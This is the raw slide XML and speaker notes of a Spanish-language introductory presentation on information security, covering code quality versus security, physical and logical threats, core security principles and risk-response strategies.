      <dsp:txXfrm>
        <a:off x="4976893" y="0"/>
        <a:ext cx="1776447" cy="771700"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{317AD316-92B0-40BA-9B89-C1C6520E3C16}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6884375"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Producción</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7270225" y="0"/>
        <a:ext cx="1776447" cy="7717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3048C-7D26-41CC-B180-A5830242493C}" type="datetimeFigureOut">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>16/02/2026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93EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>‹Nº›</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2799293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ncibe.es/protege-tu-empresa/blog/phishing-no-muerdas-el-anzuel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En esta diapositiva, exploraremos la relación entre la calidad y la seguridad del código en el desarrollo de software.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Similitudes y diferencias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Control de calidad se enfoca en la funcionalidad, eficiencia y experiencia del usuario.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Control de seguridad requiere atención especializada y no siempre es evidente.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Importancia de la seguridad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Los agujeros de seguridad no son obvios y a menudo se descubren a través de uso malintencionado.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Es crucial no descuidar la seguridad, ya que su incumplimiento puede ser devastador.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Herramientas y pruebas especializadas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Utilizamos herramientas y pruebas especializadas en ciberseguridad para identificar agujeros de seguridad.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>En resumen, la relación entre calidad y seguridad del código es esencial en el desarrollo de software. Aunque la calidad es más evidente, no debemos descuidar la seguridad, que requiere enfoque especializado y pruebas específicas para garantizar la confiabilidad de nuestras aplicaciones.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Marcador de número de diapositiva 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="121142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8BA53-B777-164A-9CF8-46BCAA5CAA9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275DCA2-047F-2C5B-486A-640F0CA579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C130F7A-68E6-4454-7EE0-30B6FEBD7833}"/>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969DB2C-CCE3-D3E5-718A-64C9D0F05989}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="555170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1AE27-97B8-E791-69C3-41897E40F57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CBE013A-42A6-AE2A-E088-077870243A0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28F1901-6A68-5E77-AE86-DFFCEBF41929}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Cuando hablamos de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>seguridad física</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t> nos referimos a todos aquellos mecanismos (generalmente de prevención y detección) destinados a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>proteger físicamente cualquier recurso hardware del sistema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t> (desde un simple teclado hasta una cinta de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>backup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t> con toda la información que hay en el sistema, pasando por los servidores o la propia CPU de la máquina)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="es-ES" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Las principales amenazas que se prevén son:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Desastres naturales, incendios accidentales y cualquier variación producida por las condiciones ambientales. Inundaciones….</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Century Gothic"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Amenazas ocasionadas por el hombre: robos o sabotajes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Disturbios internos y externos deliberados.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Tener controlado el ambiente y acceso físico permite disminuir siniestros y tener los medios para luchar contra accidentes.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Marcador de número de diapositiva 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D1829A4-194C-2ED1-A1E8-9EBA6ED5ADB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1626664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C1F4C-66F5-56C9-12BB-88DEEEDF60F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A8F77A-59F4-3B10-3CF5-1BB5A6E674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B1D321-45B9-9539-3B4B-3481D85E6F8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Cuando hablamos de seguridad lógica, nos referimos a todos aquellos mecanismos (generalmente de prevención y detección) destinados a proteger lógicamente los recursos digitales de un sistema informático (desde la integridad de los datos hasta la confidencialidad de la información, pasando por la seguridad de las redes y sistemas). Las principales amenazas que se prevén son:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Amenazas cibernéticas: ataques informáticos, malware, virus y otras amenazas digitales que pueden comprometer la seguridad y funcionamiento de los sistemas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Accesos no autorizados: intentos de intrusión en sistemas, redes o aplicaciones por personas no autorizadas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Robo de datos y ciberdelincuencia: intentos de robo de información confidencial, fraudes en línea y otras actividades delictivas en el entorno digital.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Fallos de seguridad: vulnerabilidades en el software y sistemas que pueden ser explotadas por atacantes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Mantener medidas de seguridad lógica adecuadas y contar con protocolos de respuesta a incidentes es fundamental para proteger los activos digitales y la integridad de la información en un entorno tecnológico.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Marcador de número de diapositiva 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29295876-CF6F-5BA2-3937-2DA74B754B48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="209695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0DBE9-1E9F-8704-EDC0-36FD4F08172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CB4878-1EB9-8F51-B6D5-C55336DD257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78C6E9E-E516-C339-A980-66F1B22744A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Marcador de número de diapositiva 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90CFBFB0-3B3F-4012-AC82-09D3F80BF3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3564135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83E31-9F04-F460-CBCA-3EECAA9BDDB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B63BAD-8910-6C6D-589D-8D7A98BD40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4495097-91CE-E080-C7E0-5470A6BEA265}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Cuando hablamos de seguridad informática, se fundamenta en una serie de principios esenciales que guían nuestra protección de la información y sistemas. Estos principios son:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Confidencialidad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Garantiza que la información esté protegida contra acceso no autorizado.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Integridad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Asegura que la información no se altere de manera no autorizada.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Disponibilidad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La información y los sistemas deben estar disponibles y funcionando cuando se necesiten.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Autenticidad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Verifica la autenticidad de los usuarios y la información.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Trazabilidad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Registra y rastrea las actividades y eventos en el sistema para su seguimiento.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="es-ES" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>El análisis de riesgos es un proceso fundamental en la seguridad informática. Implica:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Estimación de probabilidad de posibles impactos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Evaluar cuán probable es que ocurran amenazas y cuáles serían sus efectos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Estrategias de respuesta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Ante los riesgos identificados, podemos:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="2" indent="-228600" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Evitarlos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t> cambiando el diseño o enfoque del sistema.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="2" indent="-228600" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Controlarlos o mitigarlos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t> implementando medidas de seguridad adecuadas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="2" indent="-228600" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Aceptarlos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t> presupuestando su coste y asumiendo la posibilidad de que ocurran.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="2" indent="-228600" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Transferirlos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t> mediante la contratación de seguros o servicios que deleguen la responsabilidad.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>El análisis de riesgos es esencial para tomar decisiones informadas sobre cómo proteger la información y los sistemas en función de su valor y las amenazas potenciales.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Marcador de número de diapositiva 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3A5CF15-00A5-DB20-F7FB-436E23FC400D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="812650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99AB4-5F27-4715-63A9-94C6BF91ECD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61CB1D8-1B8F-BAE7-B500-7317608A69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54370E-8C09-510D-2C6A-155F35E36078}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Cuando hablamos de seguridad informática, se fundamenta en una serie de principios esenciales que guían nuestra protección de la información y sistemas. Estos principios son:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="0" dirty="0">
